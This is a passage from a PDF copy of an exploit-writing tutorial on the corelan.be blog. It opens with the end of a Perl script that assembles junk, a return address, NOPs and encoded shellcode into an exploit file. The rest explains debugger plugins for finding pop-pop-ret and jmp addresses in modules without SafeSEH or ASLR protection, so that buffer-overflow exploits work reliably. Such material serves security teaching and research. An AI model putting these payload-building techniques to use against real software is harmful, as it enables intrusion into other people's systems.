"x43x34x49x53x51x4fx46x51x4bx46x43x50x46x36" .
"x45x34x4cx4bx50x46x50x30x4cx4bx51x50x44x4c" .
"x4cx4bx42x50x45x4cx4ex4dx4cx4bx42x48x43x38" .
"x4bx39x4ax58x4dx53x49x50x43x5ax50x50x43x58" .
"x4cx30x4dx5ax45x54x51x4fx42x48x4dx48x4bx4e" .
"x4dx5ax44x4ex50x57x4bx4fx4bx57x43x53x43x51" .
"x42x4cx43x53x43x30x41x41";
$payload =$junk.$ret.$nop.$shellcode;
open ($FILE,">$sploitfile");
print $FILE $payload;
close($FILE);
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 11 / 20
12. http://www.corelan.be:8800 - Page 12 / 20
Ollydbg plugins
openrce.com has a large number of ollydbg plugins. Iâm not going to discuss all of them, but the
most important/usefull Ollydbg plugin when writing exploits is OllySEH
This plugin does an in-memory scanning of process loaded modules checking if they were
compiled with /safeseh. This means that you can only use this plugin when ollydbg is attached to
the process. The plugin will help you finding the correct memory space to look for
reliable/working return addresses by listing the modules that are compiled (and the ones that are
not compiled - which is even more important) with /safeseh.
Suppose you have found a SEH based vulnerability in BlazeDVD5, and you need to find a reliable
âpop pop retâ, you can use ollyseh to find all modules that are not compiled with /safeseh, and then
look for pop pop ret instructions in that memory space :
List executable modules : (E)
List safeseh modules :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 12 / 20
13. http://www.corelan.be:8800 - Page 13 / 20
Look for anything that has âNo SEHâ or (even better) â/SafeSEH OFFâ to find memory space that
can be queried for a pop pop ret instruction.
Letâs try c:program filesBlazevideoBlazeDVD 5 ProfessionalMediaPlayerCtrl.dll
You could use findjmp to find pop pop ret instructions, or you could do it the hard way by
searching for the instructions in the dll using ollydbg :
Go back to the list of executable modules, find the dll and double-click it
Right-click and choose âSearch forâ - âSequence of commandsâ.
Letâs say you want to look for pop eax, pop <something>, ret, you could do a search for :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 13 / 20
14. http://www.corelan.be:8800 - Page 14 / 20
(try all combinations with various registers until you find something). Of course, findjmp.exe will
work a lot faster because you would only need to vary the first register in the pop pop ret sequence
(and the register of the second pop would be located by findjmp automatically). It would indicate a
lot faster that this dll does not have any usefull pop pop ret combinations and that you would need
to look for another dll to use.
EIther way, this plugin can save you a lot of time when writing SEH based exploits, as you will be
able to find a reliable pop pop ret address faster than just by picking any dll and finding addresses
using elimination.
Immunity Debugger (ImmDbg) plugins/pycommands
Immunity debugger comes with a nice / large set of plugins, you can find some more useful
plugins/pycommands at the following locations :
q findtrampoline : http://www.openrce.org/forums/posts/559
q aslrdynamicbase : http://www.openrce.org/forums/posts/560
q funcdump
q nsearch : http://natemcfeters.blogspot.com/2009/02/nsearch-new-immunitydbg-searching.html
q pvefindaddr (my own custom pycommand)
Because of immdbgâs integration with python, and well documented API, you can add/write your
own commands/plugins.
Download the .py files and put them in the pycommand folder.
The nice thing about ImmDbg is that it contains aliases for the windbg commands, so
you can take advantage of the scripting power of immdbg, and still use the windbg
command set (if you are more familiar with the windbg commands)
Findtrampoline
This script offers similar functionality as findjmp or Metasploitâs msfpescan tools, when used to
find suitable return addresses when exploiting a classic stack overflow. It allows you to look for
jmp <reg>, call <reg> and push <reg> + ret combinations. (It does not offer functionality to look
for pop pop ret combinations though, which is possible with findjmp and msfpescan)
You can invoke the findtrampoline script by opening the PyCommand window and selecting the
findtrampoline script to run :
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 14 / 20
15. http://www.corelan.be:8800 - Page 15 / 20
Double-click, enter the register you want to look for as an argument, and click âOKâ to start the
script :
Now wait for the search to complete. The search will look in all loaded modules for a jmp esp (in
our example) and then display the number of trampolines/addresses found :
Alternatively, you can just run the !findtrampoline <reg> command at the bottom of the screen
(command line) to kick of the script.
Both will trigger 3 search operations to be conducted (jmp, call, and push+ret)
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 15 / 20
16. http://www.corelan.be:8800 - Page 16 / 20
To see the results, open the âLog dataâ window :
In order to see what instruction was found, select the address and double-click. Then open the
âCPUâ window
Alternatively, you could use the !searchcode command to look for f.i. jmp esp instruction :
(The output will indicate the address, module (dll) and whether the instruction is in an executable
page or not.) Of course, the searchopcode command also works fine, but !findtrampoline will
look for all working combinations (whereas searchopcode requires a specific instruction to look for)
aslrdynamicbase
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 16 / 20
17. http://www.corelan.be:8800 - Page 17 / 20
This command will list all modules and indicate whether they are enabled for address space layout
randomization or not (vista and 2008). This will allow you to build reliable exploits for these
OSâes by looking for return addresses that will have the same address even after a reboot (basically
by selecting the application executable or non-aslr enabled dll memory space when looking for
these addresses)
This command does not require any arguments. Just run the command from a command line, and
look at the ASLR /dynamicbase table for memory locations that are not ASLR enabled/aware.
This one does not only save you time, it will simply mean the difference between being able to
build a reliably working exploit and a one-shot working exploit (one that stops working after a
reboot).
pvefindaddr
This is a small plugin I wrote myself. For more information about this plugin, login and visit the
forum at
http://www.corelan.be:8800/index.php/forum/writing-exploits/pvefindaddr-pycommand-plugin-for
-immdbg/
I will shortly discuss the following 4 operations (but the current version has many more functions)
:
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 17 / 20
18. http://www.corelan.be:8800 - Page 18 / 20
q p : look for pop/pop/ret combinations (useful when building SEH based exploits) It will automatically
filter out the modules that are safeseh protected. So the addresses you get will be not safeseh
protected. Furthermore, it will automatically try all combinations and look in all loaded modules (so
you donât have to specify a register or module. If you specify a register, then it will only show
combinations where the register is used. If you specify a register and a module name, then you will
obviously get all combinations where this register is used, and only from the specified module (even if
that module is safeseh protected !)
q j : look for all jmp/call/push ret combinations (useful when building direct ret overwrite exploits). You
have to specify the register to jump to, and optionally specify a module name
q jseh : this operation is useful when bypassing safeseh protections. (see tutorial series part 6). Again,
this operation will search for all combinations automatically
q nosafeseh : show all currently loaded modules that are not safeseh protected
Download :
[download id=31]
Other pycommands & command syntax
In order to get more info on how to use the pycommands, simply run the pycommand from the
command line without arguments, open the log data windows and youâll get a short help text
indicating the parameters that need to be provided in order to correctly run the script.
Other commands will simply open a nice wizard when they are launched without parameters (such
as the !antidep command), and others will just throw an exception :-(
More information about immdbg and pycommands can be found here and here
(ImmDbg has a lot of cool scripts to help with heap based exploit development, which is out of
scope for this article right now)
Happy hunting !
Some other cool stuff in immdbg
!packets
Allows you to capture packets from the wire and get the function that was responsible for
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 18 / 20
19. http://www.corelan.be:8800 - Page 19 / 20
sending/receiving the packets. Example : Open firefox and attach immdbg to the process. Before
kicking firefox out of the debugger-enforced breakpoint, launch !packets
Continue to run firefow and navigate to a website. Now go back to immdbg and observe the
âCaptured Packetsâ window :
!safeseh
This command will list the executable modules and indicate whether they are safeseh protected or
not. After running the !safeseh command, you need to open the âLog Dataâ window to see the
results.
This entry was posted on Saturday, September 5th, 2009 at 11:35 am and is filed under Exploits,
Security You can follow any responses to this entry through the Comments (RSS) feed. You can
leave a response, or trackback from your own site.
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 19 / 20
20. http://www.corelan.be:8800 - Page 20 / 20
Peter Van Eeckhoutte´s Blog - All rights reserved. Terms Of Use are applicable to this pdf file. Check http://www.corelan.be:8800/index.php/terms-of-use 14/11/2009 - 20 / 20